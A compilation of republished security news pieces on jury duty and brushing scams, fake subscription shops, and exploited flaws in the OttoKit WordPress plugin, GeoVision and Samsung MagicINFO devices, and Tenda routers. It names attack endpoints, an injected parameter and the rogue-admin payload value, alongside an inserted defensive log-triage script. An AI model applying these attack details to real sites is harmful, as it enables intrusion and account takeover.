By Phil Muncaster for welivesecurity
When we get the call, it's our legal responsibility to attend jury service. But sometimes that call won't come from the courts-- it will be a scammer.

Jury duty is one of the key civic duties you may be called upon to serve. But in your haste to fulfill this obligation, you may be targeted by malicious actors preying on your fear of arrest, penalties or other legal trouble. Indeed, jury duty cons have been a long-running scheme where fraudsters pretend to be the government.
As always, awareness is the best defense against these persistent attempts to steal your hard-earned money or personal information. So take a few minutes to arm yourself with some essential knowledge.
How to spot a jury duty scam
Jury duty/service scams are nothing new. In fact, United States Courts has been warning its citizens about them for over a decade. They're also far from limited to North America. The UK's Chartered Trading Standards Institute has in the past also warned about bogus texts inviting recipients to jury service, or risk facing fines.
So what do they typically involve?
Broadly speaking, victims will receive a phone call, text or email from a scammer impersonating a law enforcement officer or court official. They will claim the victim hasn't shown up for their allotted jury service and must pay a fine as a result. They may often also ask for personal information, which will be sold on the dark web and/or used to commit follow-on identity fraud.
Look out for the following tell-tale signs of a jury duty scam:
- Threatening language: A classic social engineering technique is to create a sense of anxiety in the victim, so that they become more pliable. In this case, the scammers might claim that police will show up and arrest you if you don't pay up quickly. They could also use legalese to add weight to their fabricated story and persona. Don't believe what they say.
- Phishing tactics: Email scams of this sort use the same kind of tactics, creating a sense of urgency in the recipient in order to rush them into making a rash decision. Emails will most likely contain logos and other branding to appear legitimate. They may also look to spoof the sender domain to make it appear as if sent from a legitimate authority. Hover your cursor over it and it may reveal a completely different, random email address. Unless they've been written by AI tools, phishing emails may also contain clear grammar and spelling mistakes.
- Other tell-tale signs are clickable links, which may take you to spoofed phishing sites where you're prompted to enter sensitive personal and financial information. These emails are also unlikely to be addressed to you personally. A generic greeting is a clear sign it's a scam.
- Expect similar language in phishing texts (smishing), with clickable links and urgent demands to pay a fine or risk jail time.
- Payment options: No court, police department or government agency will ask for payment over the phone for 'missed' jury service. Yet scammers will do so, often requesting that funds be transferred by crypto, gift cards, wire transfer or an instant payment app like Zelle, Venmo or Cash App. That's because it's harder to trace these payments and even harder for you to get that money back once it's been sent.
- Requests for information: Scammers may ask for sensitive personal information like Social Security details, as well as demanding you send them funds. That should be a red flag as it'
How to stay safe from jury duty scams
Staying safe from these scams is all about awareness. So look out for the signs above that should ring alarm bells. Also be aware that failing to turn up for jury service will never be grounds for arrest. In the US at least, summonses are sent via USPS mail, as are notices informing you if you've missed your date. Fines will only be issued if you repeatedly ignore these notices and fail to contact the court.
Follow these additional steps to keep the scammers at bay:
- Never click through on an unsolicited email or text, even if it appears genuine. Always contact the authority in question independently (rather than replying to the email/text)
- Never divulge sensitive personal and financial information online or over the phone
- Remember that scammers can spoof their Caller ID to appear legitimate
- Never pay alleged fines by gift cards, crypto or money transfers
- If threatened while on the phone, stay calm, ask where the person is calling from, hang up and then call that office to check its legitimacy
- Keep up to date with the latest scam tactics from the FTC and other government sites
- Use anti-malware on all devices and computers to help filter out phishing messages and emails
What to do if you've been scammed
If you realize you've been scammed, don't panic. Work step by step through the following:
- If you're on a call, hang up immediately
- Make a note of as much information as possible, including the 'name' and/or badge number of the scammer, what they said and where they called/emailed from, and payment details
- Report the incident to the police and FTC. While they may not be able to help you recover any stolen money, it may help others
- Call your bank and freeze your credit/debit cards
- Monitor your bank account for any unusual activity
- Freeze your credit with the 3 big credit agencies, so scammers can't take out credit lines in your name
It can be a daunting task when threatened with jail time and steep fines. But stand your ground, stay calm, and don't let the scammers win.
Hackers Exploit OttoKit WordPress Plugin Flaw to Add Admin Accounts
By Bill Toulas for bleepingcomputer

Hackers are exploiting a critical unauthenticated privilege escalation vulnerability in the OttoKit WordPress plugin to create rogue admin accounts on targeted sites.
OttoKit-- formerly SureTriggers-- is a WordPress automation and integration plugin used in over 100,000 sites, allowing users to connect their websites to third-party services and automate workflows.
Patchstack received a report about a critical vulnerability in OttoKit on April 11, 2025, from researcher Denver Jackson.
The flaw, tracked under the identifier CVE-2025-27007, allows attackers to gain administrator access via the plugin's API by exploiting a logic error in the 'create_wp_connection' function, bypassing authentication checks when application passwords aren't set.
The vendor was informed the next day, and a patch was released on April 21, 2025, with OttoKit version 1.0.83, adding a validation check for the access key used in the request.
By April 24, 2025, most plugin users had been force-updated to the patched version.
Now exploited in attacks
Patchstack published its report on May 5, 2025, but a new update warns that exploitation activity started roughly 90 minutes after public disclosure.
Attackers attempted exploitation by targeting REST API endpoints, sending requests mimicking legitimate integration attempts, using 'create_wp_connection' with guessed or brute-forced administrator usernames, random passwords, and fake access keys and email addresses.
Once the initial exploit was successful, attackers issued follow-up API calls to '/wp-json/sure-triggers/v1/automation/action' and '?rest_route=/wp-json/sure-triggers/v1/automation/action', including the payload value "type_event": "create_user_if_not_exists".
On vulnerable installations, this silently creates new administrator accounts.
"It is strongly recommended to update your site as soon as possible if you are using the OttoKit plugin, and to review your logs and site settings for these indicators of attack and compromise," suggests Patchstack.
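Added example (not Patchstack's or the plugin's own code): a small access-log triage script that flags requests to both URL forms of the follow-up endpoint quoted above, so the indicators can be checked against a site's logs. It assumes Apache/nginx combined-style log lines and that known integration sources can be allow-listed by IP; the sample log lines are constructed.

```python
"""Access-log triage for the OttoKit / SureTriggers exploitation indicators
described in the Patchstack report.

Added example, not Patchstack's or the plugin's own code.  It recognises both
URL forms of the follow-up call quoted above and treats any other request into
the plugin's REST namespace as lower-severity recon.  Access logs normally omit
the POST body, so the "type_event": "create_user_if_not_exists" value cannot be
checked from logs alone; every hit is something to cross-check against the
site's administrator list.  Sample log lines below are constructed.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Plugin REST namespace (taken from the endpoint quoted in the report) and the
# follow-up endpoint used to create the rogue administrator.
SURE_TRIGGERS_NS = "sure-triggers/v1"
ACTION_ENDPOINT = "sure-triggers/v1/automation/action"

# Apache/nginx combined-style prefix: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def rest_route_of(target: str) -> str:
    """Return the REST route a request targets, normalising both URL forms:
    /wp-json/<route> and /index.php?rest_route=<route> (possibly URL-encoded)."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if "rest_route" in query:
        return unquote(query["rest_route"][0])
    return unquote(parts.path)


def triage_line(line: str, allowlist=frozenset()):
    """Return a finding dict for one log line, or None if it is not of interest.
    'allowlist' holds source IPs of known, legitimate integrations (assumption:
    the site owner knows these)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    route = rest_route_of(m["target"])
    if SURE_TRIGGERS_NS not in route or m["ip"] in allowlist:
        return None
    is_action = route.rstrip("/").endswith(ACTION_ENDPOINT)
    return {
        "ip": m["ip"],
        "time": m["time"],
        "method": m["method"],
        "route": route,
        "status": int(m["status"]),
        # A successful call to the action endpoint is the indicator that matters.
        "severity": "high" if is_action and m["status"] == "200" else "medium",
    }


def triage(lines, allowlist=frozenset()):
    """Run triage_line over an iterable of log lines; return the findings."""
    return [f for f in (triage_line(l, allowlist) for l in lines) if f]


def suspect_ips(findings):
    """Source IPs with at least one high-severity finding, most hits first."""
    counts = Counter(f["ip"] for f in findings if f["severity"] == "high")
    return [ip for ip, _ in counts.most_common()]


# Constructed sample traffic (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [05/May/2025:14:02:11 +0000] "GET /wp-login.php HTTP/1.1" 200 4521
203.0.113.7 - - [05/May/2025:14:02:12 +0000] "GET /wp-json/sure-triggers/v1 HTTP/1.1" 200 1190
203.0.113.7 - - [05/May/2025:14:02:14 +0000] "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1" 200 118
198.51.100.22 - - [05/May/2025:14:05:40 +0000] "POST /index.php?rest_route=%2Fwp-json%2Fsure-triggers%2Fv1%2Fautomation%2Faction HTTP/1.1" 200 118
198.51.100.9 - - [05/May/2025:14:06:01 +0000] "GET /?rest_route=/wp/v2/posts HTTP/1.1" 200 9822
198.51.100.9 - - [05/May/2025:14:06:02 +0000] "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1" 403 60
""".splitlines()


if __name__ == "__main__":
    findings = triage(SAMPLE_LOG)
    for f in findings:
        print(f"{f['severity']:6} {f['ip']:15} {f['method']} {f['route']} -> {f['status']}")
    print("review these sources against the site's administrator list:", suspect_ips(findings))
```

Pipe a real access log into triage() in place of SAMPLE_LOG; a high-severity hit from an unexpected source should be followed by checking the WordPress user list for administrators created around that timestamp.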
This is the second critical severity flaw in OttoKit that hackers have exploited since April 2025, with the previous being another authentication bypass bug tracked as CVE-2025-3102.
Exploitation of that flaw started on the same day of disclosure, with threat actors attempting to create rogue administrator accounts with randomized usernames, passwords, and email addresses, indicating automated attempts.
Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet
By Ravie Lakshmanan for thehackernews

Threat actors have been observed actively exploiting security flaws in GeoVision end-of-life (EoL) Internet of Things (IoT) devices to corral them into a Mirai botnet for conducting distributed denial-of-service (DDoS) attacks.
The activity, first observed by the Akamai Security Intelligence and Response Team (SIRT) in early April 2025, involves the exploitation of 2 operating system command injection flaws-- CVE-2024-6047 and CVE-2024-11120 (CVSS scores: 9.8)-- that could be used to execute arbitrary system commands.
"The exploit targets the /DateSetting.cgi endpoint in GeoVision IoT devices, and injects commands into the szSrvIpAddr parameter," Akamai researcher Kyle Lefton said in a report shared with The Hacker News.
In the attacks detected by the web security and infrastructure company, the botnet has been found injecting commands to download and execute an ARM version of the Mirai malware called LZRD.
Some of the vulnerabilities exploited by the botnet include a Hadoop YARN vulnerability, CVE-2018-10561, and a bug impacting DigiEver that was highlighted in December 2024.
There is some evidence to suggest that the campaign overlaps with previously recorded activity under the name InfectedSlurs.
"One of the most effective ways for cybercriminals to start assembling a botnet is to target poorly secured and outdated firmware on older devices," Lefton said.
"There are many hardware manufacturers who do not issue patches for retired devices-- in some cases, the manufacturer itself may be defunct."
Given that the affected GeoVision devices are unlikely to receive new patches, it's recommended that users upgrade to a newer model to safeguard against potential threats.
Samsung MagicINFO Flaw Exploited in Mirai Attacks
The disclosure comes as Arctic Wolf and the SANS Technology Institute warned of active exploitation of CVE-2024-7399-- CVSS score: 8.8-- a path traversal flaw in Samsung MagicINFO 9 Server that could enable an attacker to write arbitrary files as system authority, to deliver the Mirai botnet.
While the issue was addressed by Samsung in August 2024, it has since been weaponized by attackers following the release of a proof-of-concept (PoC) on April 30, 2025, to retrieve and execute a shell script responsible for downloading the botnet.
"The vulnerability allows for arbitrary file writing by unauthenticated users, and may ultimately lead to remote code execution when the vulnerability is used to write specially crafted JavaServer Pages (JSP) files," Arctic Wolf said.
Users are recommended to update their instances to version 21.1050 and later to mitigate potential operational impact.
Multiple Flaws in Tenda RX2 Pro Let Attackers Gain Admin Access
By Divya for gbhackers

Security researchers have uncovered a series of critical vulnerabilities in the Tenda RX2 Pro Dual-Band Gigabit WiFi 6 Router-- Firmware V16.03.30.14-- which could allow remote attackers to gain administrative access and, in many cases, full root shell on the device.
Despite the notification, Tenda has not responded, and no patches are available.
Eleven separate CVEs have been assigned to vulnerabilities discovered in Tenda's web management portal, firmware, and internal services.
Attackers can exploit combinations of these bugs to escalate privileges, bypass network segmentation, and ultimately execute arbitrary code with root privileges.
The vulnerabilities are particularly troubling because they can be exploited by anyone who connects to the device-- even from the guest WiFi network, which is supposed to be isolated.
How the Attacks Work
The Tenda RX2 Pro's web management interface contains numerous flaws in how it transmits and encrypts credentials and session keys.
Additionally, improper network segmentation means attackers on a guest WiFi network can target the main router functions or other clients.
Most disturbingly, attackers can enable backdoor services like telnet and an undocumented service called "ate," both of which have their own severe flaws, including command injection vulnerabilities and static credentials.
Exploit Scenarios
- Guest Network Bypass: Attackers on the guest WiFi can become "layer-2 adjacent" to the main network and bypass basic subnet restrictions. This provides a launchpad for further attacks.
- Backdoor Services: Unauthenticated users can turn on a telnet or "ate" service, both backdoors that grant shell access or allow command injection with no password required.
- Weak Encryption: Even where encryption is used, the static IVs and keys, and the transmission of those keys in plaintext, render it ineffective. Attackers can intercept and decrypt admin commands and sessions.
The researcher has reported all findings to Tenda, but as of publication, no updates or fixes have been issued.
Owners of the Tenda RX2 Pro are strongly urged to disconnect their routers from untrusted networks and consider alternative devices until official patches are released.
These vulnerabilities highlight the need for robust, industry-standard security practices in consumer networking gear. Until Tenda responds, users remain at serious risk from attackers both inside and outside their networks.
Getting Weird Parcels? - You Might be Part of a 'Brushing' Ecommerce Scam
By Brad Morton for howtogeek

Ever wondered how some of the awful products listed on online shopping sites are getting great reviews? It could be "brushing"-- a scam that uses your personal details to leave reviews for things you never purchased, to trick others into doing so.
What is a 'Brushing' Scam?
It's mail day, and the postman drops off a pile of parcels on your doorstep... And there's something extra. Something you didn't order. It's a cheap widget with no additional details or an invoice, so you shrug it off and go on with your life.
Chances are, you've just been part of a "brushing" scam.

A brushing scam is when a seller purchases their own product from an online e-commerce platform like Amazon or eBay using your name and delivery address. Once there's a record of a purchase and a delivery, they can leave a glowing review using your details that appears 100% legitimate. The seller may not have even sent you the actual product they'll leave a review for-- especially if it's expensive. You'll just receive whatever junk they had within reach to make the padded envelope look occupied, so it isn't rejected at the post office.
This may seem like a lot of effort for a single review, but its prevalence means that it must work. If the initiator of the scam is launching a new product, it can make it appear popular, and let them extol its virtues in the reviews and try and attract real customers. If they're less honorable, they're selling cheap tacky items with misleading listings that they want to lend legitimacy to using your name.
So, in a sense, you aren't the actual victim in this scam-- the people who actually pay for the product based on "your" review are. You're just a tool used by the scammer to "brush up" their reviews.
Brushing Scams Are an Indication That Your Personal Info is Compromised
While brushing scams can be done using stolen credentials for your online shopping accounts-- you can quickly check if this is the case by monitoring your purchase history-- this is usually unnecessary on the part of the scammer. It's much easier for them to just create a new account using your personal details that have previously leaked online.
This could have happened at any time, even years ago. Databases of people's personal info are available for sale online, and a valid name and address are all the scammer needs to pull off a successful brushing scam. There's nothing you can do about this either. Once your details are out there, they're out there.
What To Do if You Think Your Info Is Being Used To Scam Others
You should already be following day-to-day cybersecurity and privacy best practices, but receiving unsolicited parcels is a good excuse to go and tighten up your security a bit: update your old passwords, check for suspicious activity on your accounts, and enable multi-factor authentication wherever it's supported.
Turning down anonymous parcels is increasingly difficult, as more and more trade is done online. It's hard to know whether a parcel being handed to you is something you actually ordered, and the postman isn't going to wait on the doorstep while you try and figure it out, especially if your morning coffee is yet to kick in. As for the fake reviews, you can try and hunt them down online and report them to discourage your address from being used in the future, but there is no guarantee this will work.
Returning the parcel is also usually out of the question. Interacting with scammers is a good way to get them to focus on you, which you certainly don't want. If the parcel was addressed to you, and the law allows it, you may as well hold on to the item, and if no one comes asking for it after a while, take ownership or throw it out.
Just be aware that whatever you receive is probably the cheapest object within reach of the scammer that they could jam in a padded envelope. If it's something that could pose any danger-- like electrical items-- or food or cosmetics that may be counterfeit, or anything else that could pose a potential health or safety risk, you should probably send it straight to landfill.
What to Do if You Don't Get What You Ordered
If you suspect you're a victim of brushing, having ordered something that didn't live up to the expectations its reviews set, you should try and return it. When making purchases, watch out for signs of fake reviews and fake AI-generated products. Amazon will also warn you if an item is returned frequently.
There are whole categories of products you should be wary of purchasing online due to the elevated risks of scams and even physical harm from defective products.
How To Keep Your Personal Data Secure, and What To Do When It's Inevitably Leaked
Privacy is a diminishing resource for everyone, everywhere: whether you consent or not, your details are out there. Every time you make a purchase, you're giving your details to the seller, and their employees that handle orders and pack your items will have access to them. Your contact details exist in countless databases that could be leaked at any point-- from social media, governments, your hairdresser, and other organizations-- and even if you figure out who leaked it, the damage is already done.
None of this is worth worrying about-- it's inevitable. All you can do is try and maintain good digital hygiene to reduce the amount of new information that can leak, and be vigilant for unexpected charges to your accounts, or activity on your social media.
200+ Fake Retail Sites Used in New Wave of Subscription Scams
By Deeba Ahmed for hackread
Bitdefender uncovers a massive surge in sophisticated subscription scams disguised as online shops and evolving mystery boxes. Learn how to spot these fraudulent schemes and protect your credit card details.

Cybersecurity experts at Bitdefender have observed a notable rise in online scams involving fake ads and websites that trick people into unknowingly signing up for subscriptions. This new wave of scams is different compared to past attempts because of the effort criminals put into making these fake websites believable enough to get people to share their personal and financial information.
Bitdefender discovered over 200 incredibly realistic websites offering a wide range of products, including shoes, clothing, and electronics. Customers are tricked into providing credit card information and agreeing to monthly subscriptions without realizing these are fake.
In their detailed blog post, Bitdefender noted a particular trend of "mystery box" scams, which involve paying a small amount for a box of unknown items, often with hidden recurring payments and links to fake online shops. Scammers impersonate content creators or create fake pages on Facebook and other social media platforms to promote these fraudulent schemes. They exploit shoppers' tendency not to pay close attention during an online purchase they believe is genuine, introducing a second layer of deception before the payment is completed.
This scam has various versions, each exploiting the human fascination with the unknown, such as offering boxes supposedly left at post offices or bags found at airports and requiring a small payment to claim ownership. The primary objective is collecting financial information from victims who believe they are getting a great deal.
Given the increased public awareness regarding mystery box scams, cybercriminals have adapted their methods to continue defrauding people. Victims are unknowingly enrolled in subscriptions before completing payment for a mystery box, often with subscription terms hidden in small print. Many of these sites are still active, researchers noted.
These scams are heavily promoted on social media through sponsored ads and sometimes via links to subscription-based online shops registered in Cyprus. This suggests an offshore company's involvement, as per Bitdefender's analysis, shared with Hackread.com.
The deceptive ads frequently redirect users to various online stores offering diverse goods. Researchers discovered around 140 websites employing this tactic, with one example revealing a hidden recurring charge: "Buy at member price and get FREE access… with an account top-up of 44.00 EUR/every 14 days."
These 'electronic stores' offer numerous membership tiers with benefits, but subscription costs vary. Store credits and discounts are used to deceive victims into believing they're making a worthwhile purchase, even though some sell outdated and overpriced items.
Notably, the contact address of many of these hundreds of active websites-- Andrea Kalvou 13, 3085 Limassol-- has been linked to the Paradise Papers leak in the ICIJ Offshore Leaks Database, suggesting a potentially wider network of illicit activity.
The profitability of the subscription model is driving criminals to invest in ads featuring fake endorsements and to expand their schemes beyond mystery boxes to include other deceptive offers like low-quality products and fake investments.
"With funds pumped into ads, real-looking websites, impersonations of people and brands, and all kinds of other avenues of attack, we're bound to see these kinds of frauds inundate the online world," researchers concluded.
© vocalbits.com